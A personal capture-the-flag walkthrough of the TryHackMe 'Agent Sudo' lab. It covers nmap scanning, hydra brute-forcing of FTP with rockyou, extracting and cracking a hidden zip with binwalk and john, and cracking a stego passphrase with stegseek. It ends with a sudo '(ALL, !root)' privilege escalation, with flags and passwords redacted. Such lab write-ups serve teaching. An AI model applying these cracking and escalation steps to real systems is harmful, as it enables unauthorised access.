💭 Thoughts after doing the room

It was a fun room. Little bit all over the place 😁 Didn’t like the enumerate part too much. But the steg part was fun, because I discovered stegseek. I only knew stegcracker before so it was cool to see how fast stegseek was.

Task 1: Author note

No to do

Task 2: Enumerate

How many open ports?

root@ip-10-10-251-143:~# nmap -T4

Starting Nmap 7.60 ( ) at 2023-03-27 19:17 BST
Nmap scan report for (
Host is up (0.027s latency).
Not shown: 997 closed ports
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:32:76:84:F7:57 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.79 seconds

How you redirect yourself to a secret page?

When visiting the IP via http it hints that you need to change the user-agent

What is the agent name?

The only option I could think of was bruteforcing the user-agent, which seemed odd for the enmerating part. I rarely check hints, but now I did, where they revealed that the agent name is C. In retrospect I could have guessed that the user agent should be a single upper case letter, because the message was from Agent R.

If I’d have known that it’s just one letter from the alphabet I might have done requests with Burpsuite manually like this

  • Request page with proxy on
  • send to intruder

Task 3: Hash cracking and brute-force

FTP password

Bruteforce with hydra and rockme wordlist.

root@ip-10-10-251-143:~# hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp -v
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( starting at 2023-03-27 19:45:45
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[21][ftp] host:   login: chris   password: 🤐
[STATUS] attack finished for (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2023-03-27 19:46:44

Zip file password

login to ftp server with password from bruteforce and download all files

root@ip-10-10-251-143:~/agentsudo# ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( chris
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
-rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
-rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png
226 Directory send OK.
ftp> mget *.*
mget To_agentJ.txt? 
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for To_agentJ.txt (217 bytes).
226 Transfer complete.
217 bytes received in 0.00 secs (63.9837 kB/s)
mget cute-alien.jpg? 
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for cute-alien.jpg (33143 bytes).
226 Transfer complete.
33143 bytes received in 0.00 secs (37.1854 MB/s)
mget cutie.png? 
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for cutie.png (34842 bytes).
226 Transfer complete.
34842 bytes received in 0.00 secs (45.3933 MB/s)

Read the text file

root@ip-10-10-251-143:~/agentsudo# cat To_agentJ.txt 
Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.

Agent C

So there must be some info in the pictures. Usually my first choice would have been exiftool, but because the heading of this task is “Zip file password” I chose to check the images with binwalk.

root@ip-10-10-251-143:~/agentsudo# binwalk cute-alien.jpg 

0             0x0             JPEG image data, JFIF standard 1.01

root@ip-10-10-251-143:~/agentsudo# binwalk cutie.png 

0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
869           0x365           Zlib compressed data, best compression
34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820         0x8804          End of Zip archive

Bingo, cutie.png contains a zip archive.

binwalk -e cutie.png to extraxt.

Attempting to unzip

root@ip-10-10-251-143:~/agentsudo/_cutie.png.extracted# 7z x 

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_GB.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7571 (800F12),ASM,AES-NI)

Scanning the drive for archives:
1 file, 280 bytes (1 KiB)

Extracting archive:
Path =
Type = zip
Physical Size = 280

Enter password (will not be echoed):
ERROR: Wrong password : To_agentR.txt
Sub items Errors: 1

Archives with Errors: 1

Sub items Errors: 1

It’s password protected. So I’ll try to crack it with john. To do this I will first need to get the hash with zip2john

root@ip-10-10-251-143:~/agentsudo/_cutie.png.extracted# zip2john > ziphash.txt
root@ip-10-10-251-143:~/agentsudo/_cutie.png.extracted# cat ziphash.txt$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4🤐🤐🤐c0b5e64e*4969f382486cb6767ae6*$/zip2$

Now give the hash to John

root@ip-10-10-251-143:~/agentsudo/_cutie.png.extracted# john ziphash.txt 
Warning: detected hash type "ZIP", but the string is also recognized as "ZIP-opencl"
Use the "--format=ZIP-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/opt/john/password.lst
🤐            (
1g 0:00:00:04 DONE 2/3 (2023-03-27 20:16) 0.2057g/s 9144p/s 9144c/s 9144C/s 123456..Peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Extract archive with 7z x and password.

Reading new note

root@ip-10-10-251-143:~/agentsudo/_cutie.png.extracted# cat To_agentR.txt 
Agent C,

We need to send the picture to 'Q🤐x' as soon as possible!

Agent R

steg password

Since this task is called “steg password” (stenagrophy) we’re likely looking for a string like a password. Base64 ist usually the first guess, so I try that.

echo "Q🤐x" | base64 and I get a string that makes sense and could be the password.

Who is the other agent (in full name)?

Download stegseek from

apt install ./stegseek_0.6-1.deb

I was interested how long this would take, so I used the time command

root@ip-10-10-251-143:~/agentsudo# time stegseek cute-alien.jpg stegpw.txt 
StegSeek 0.6 -

[i] Found passphrase: "🤐"
[i] Original filename: "message.txt".
[i] Extracting to "cute-alien.jpg.out".

real	0m0.048s
user	0m0.011s
sys	0m0.000s

For fun I wanted to know how long it would take with the big rockyou list.

root@ip-10-10-251-143:~/agentsudo# time stegseek cute-alien.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 -

[i] Found passphrase: "🤐"           
[i] Original filename: "message.txt".
[i] Extracting to "cute-alien.jpg.out".

real	0m0.663s
user	0m0.981s
sys	0m0.008s

Not even a second on a THM VPS 🤭 Wow. Could have skipped the previous 3 steps from the task. Hehe.

Who is the other agent (in full name)?

Checking what’s in the file.

root@ip-10-10-251-143:~/agentsudo# cat cute-alien.jpg.out 
Hi james,

Glad you find this message. Your login password is 🤭

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,

I won’t hide the james answer here, becuase it is shown in a lot of output anyways.

Task 4: Capture the user flag

What is the user flag?

Login as james via ssh and the password we just got.

james@agent-sudo:~$ ls
Alien_autospy.jpg  user_flag.txt
james@agent-sudo:~$ cat user_flag.txt 

What is the incident of the photo called?

Downloaded the image, just looks like a weird alien autopsy picture.

I do a reverse image search with

One of the articles says what the event is called.

🤭 alien autopsy

Task 5: Privilege escalation

CVE number for the escalation

The room is called sudo, and checking what I can do with sudo is also one of the first things I do when I check a new user.

sudo -l shows

james@agent-sudo:~$ sudo -l
Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass,

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash

To be honest, I haven’t seen ALL, !root before. It means the current user james can run bash as every user except root.

Googling for ALL, !root quickly showed a exploit-db entry with the CVE

What is the root flag?

james@agent-sudo:~$ sudo 🤭
root@agent-sudo:~# cd /root/
root@agent-sudo:/root# ls
root@agent-sudo:/root# cat root.txt 
To Mr.hacker,

Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine. 

Your flag is 

🤭 a.k.a Agent R

(Bonus) Who is Agent R?

Name from root.txt